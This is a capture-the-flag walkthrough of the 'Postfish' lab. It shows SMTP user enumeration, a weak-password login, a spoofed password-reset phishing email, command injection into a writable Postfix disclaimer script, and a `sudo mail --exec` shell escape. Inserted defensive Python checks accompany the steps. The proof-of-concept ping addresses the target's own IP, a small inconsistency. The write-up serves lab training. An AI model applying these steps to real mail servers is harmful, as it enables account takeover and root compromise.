# Postfish

I added the IP and hostname to the hosts file for convenience: `sudo nano /etc/hosts`

I then ran nmap to see which ports were open.

```
$ sudo nmap -sC -Pn -p- postfish.offsec
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 11:33 EST
Nmap scan report for postfish.offsec (192.168.169.137)
Host is up (0.062s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
25/tcp  open  smtp
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3
|_pop3-capabilities: USER RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE STLS SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
143/tcp open  imap
|_imap-capabilities: capabilities listed SASL-IR more STARTTLS IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login ID LOGIN-REFERRALS LITERAL+ Pre-login ENABLE OK
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
993/tcp open  imaps
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: capabilities listed ID more IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login LITERAL+ LOGIN-REFERRALS SASL-IR Pre-login ENABLE OK
995/tcp open  pop3s
|_pop3-capabilities: USER CAPA PIPELINING RESP-CODES UIDL SASL(PLAIN) TOP AUTH-RESP-CODE
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time

Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds
```

I noticed a website running on port 80. It does not have much information, but there is a team page. I have seen a couple of instances where text on such a page is related to a user's password, so I create a dictionary from it with [cewl](/menu/tools-of-the-trade/cewl.md).

```
cewl http://postfish.off/team.html -m 5 -w team.txt 
```

I run this custom dictionary through smtp-user-enum to find valid mail accounts on the server. This shows that the sales and legal accounts exist.

```
smtp-user-enum -U team.txt -t postfish.offsec                                                           
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... team.txt
Target count ............. 1
Username count ........... 75
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 13:10:39 2021 #########
postfish.offsec: Sales exists
postfish.offsec: Legal exists
######## Scan completed at Tue Dec 21 13:10:42 2021 #########
2 results.

75 queries in 3 seconds (25.0 queries / sec)

```

I also take the team members' names, iterate through common email naming schemes, and run this second custom dictionary through smtp-user-enum as well. This confirms the account naming scheme.

```
smtp-user-enum -U users.lst -t postfish.offsec                                               
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lst
Target count ............. 1
Username count ........... 40
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 11:57:31 2021 #########
postfish.offsec: claire.madison exists
postfish.offsec: mike.ross exists
postfish.offsec: brian.moore exists
postfish.offsec: sarah.lorem exists
postfish.offsec: claire.madison@postfish.off exists
postfish.offsec: mike.ross@postfish.off exists
postfish.offsec: brian.moore@postfish.off exists
postfish.offsec: sarah.lorem@postfish.off exists
######## Scan completed at Tue Dec 21 11:57:33 2021 #########
8 results.

40 queries in 2 seconds (20.0 queries / sec)

```
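As an added example (not part of the original walkthrough), a small check a defender can run against Postfix's main.cf: it parses the configuration and reports whether VRFY, the mode smtp-user-enum used above, is still enabled. The weak and hardened fragments are constructed, and `parse_main_cf` and `vrfy_exposed` are my own names.

```python
import re

# Constructed Postfix main.cf fragments (not the target's real configuration).
# The weak one leaves disable_vrfy_command at its default, so VRFY answers
# differ between known and unknown local users, which is what smtp-user-enum
# relied on above.
WEAK_MAIN_CF = """\
myhostname = postfish.off
smtpd_banner = $myhostname ESMTP
smtpd_recipient_restrictions = permit_mynetworks,
    reject_unauth_destination
"""

HARDENED_MAIN_CF = """\
myhostname = postfish.off
smtpd_banner = $myhostname ESMTP
disable_vrfy_command = yes
"""

def parse_main_cf(text: str) -> dict:
    """Parse Postfix main.cf: 'name = value' lines, '#' comment lines, and
    continuation lines (leading whitespace) appended to the previous value."""
    params, last = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        if raw[0].isspace() and last is not None:
            params[last] += " " + raw.strip()
            continue
        m = re.match(r"^([A-Za-z0-9_]+)\s*=\s*(.*)$", raw)
        if m:
            last = m.group(1)
            params[last] = m.group(2).strip()
    return params

def vrfy_exposed(main_cf: str) -> bool:
    """True if the server would still answer VRFY per user. Postfix's default
    for disable_vrfy_command is 'no', so a missing parameter counts as exposed."""
    return parse_main_cf(main_cf).get("disable_vrfy_command", "no") != "yes"
```

With `disable_vrfy_command = yes` Postfix refuses every VRFY with the same reply, so the per-user difference the enumeration depended on is gone.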

Trying the username as the password, I find that sales has the password sales as well. Using this login, I find an email in their inbox about password reset links that will be sent out in the near future.

```
curl -k 'imaps://postfish.offsec/INBOX;MAILINDEX=1' --user sales:sales
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
        id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
        by postfish.off (Postfix) with SMTP id 7712145434
        for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off

Hi Sales team,

We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.

Regards,
IT

```

We send an email to the user with a link for them to reset their password.

`sendemail -t brian.moore@postfish.off -f it@postfish.off -s postfish.off -u "Password Reset" -o tls=no`

We get a callback with the user's password.

![](/files/0urqmV4R4cAGqy2RzeeB)

We can then log in through SSH as brian.moore.

```
ssh brian.moore@postfish.off
```

Running LSE (linux-smart-enumeration), I notice an unusual file that we have access to (`/etc/postfix/disclaimer`).

Reading about this file and the other files it calls, we can derive that they add a disclaimer text to outgoing emails from two accounts (<it@postfish.off> and <brian.moore@postfish.off>). With this information we can try a proof of concept (POC).

I edit the `/etc/postfix/disclaimer` file and add the command

```
/usr/bin/ping -c 1 192.168.169.137
```

and send an email to <brian.moore@postfish.off> as we did before. As soon as I do, I see an ICMP packet arrive on my machine (`sudo tcpdump ip proto \\icmp -i tun0`).

Using this, we modify the file once more to launch a reverse shell back to our Kali box.
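As an added example (not from the walkthrough), an audit a defender could run on the Postfix side: it lists the scripts that pipe(8) transports execute according to master.cf and flags any that a non-privileged user could modify, which is the weakness exploited above. The master.cf fragment is constructed after the usual altermime disclaimer setup, and `pipe_transport_scripts`, `script_findings` and `audit_master_cf` are my own names.

```python
import os, re, stat

# Constructed master.cf fragment modelled on the usual altermime "disclaimer" setup
# (not copied from the target): a pipe transport runs a script as user 'filter'.
MASTER_CF = """\
smtp      inet  n       -       y       -       -       smtpd
    -o content_filter=dfilt:
dfilt     unix  -       n       n       -       -       pipe
    flags=Rq user=filter argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
"""

def pipe_transport_scripts(master_cf: str) -> list:
    """(service, script) for each pipe(8) transport. An entry starts in column 0
    with 8 columns (the 8th is the command); indented lines continue it, and
    that is where argv= normally sits."""
    entries, current = [], []
    for line in master_cf.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        if not line[0].isspace():
            current = [line]
            entries.append(current)
        elif current:
            current.append(line)
    found = []
    for entry in entries:
        fields = entry[0].split()
        argv = re.search(r"argv=(\S+)", " ".join(entry))
        if len(fields) >= 8 and fields[7] == "pipe" and argv:
            found.append((fields[0], argv.group(1)))
    return found

def script_findings(path: str, trusted_uids=(0,)) -> list:
    """Ways a non-privileged user could edit the script. Postfix runs it as the
    transport's user= identity, so write access means command execution as that user."""
    st = os.stat(path)
    findings = []
    if st.st_uid not in trusted_uids:
        findings.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit_master_cf(master_cf: str, root: str = "/", trusted_uids=(0,)) -> dict:
    """Map each pipe-transport script (looked up under `root`) to its findings."""
    return {script: script_findings(os.path.join(root, script.lstrip("/")), trusted_uids)
            for _svc, script in pipe_transport_scripts(master_cf)}
```

Run it with the real `/etc/postfix/master.cf` and `root="/"` on a mail host; an empty findings list for every script is the expected state.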

Now we have shell access, but this time as the 'filter' user. Here, `sudo -l` shows that we have sudo access to `/usr/bin/mail`.

Looking up 'mail' in [GTFOBins](https://gtfobins.github.io/), we see how to take advantage of this command and easily privesc with `sudo mail --exec='!/bin/sh'`.
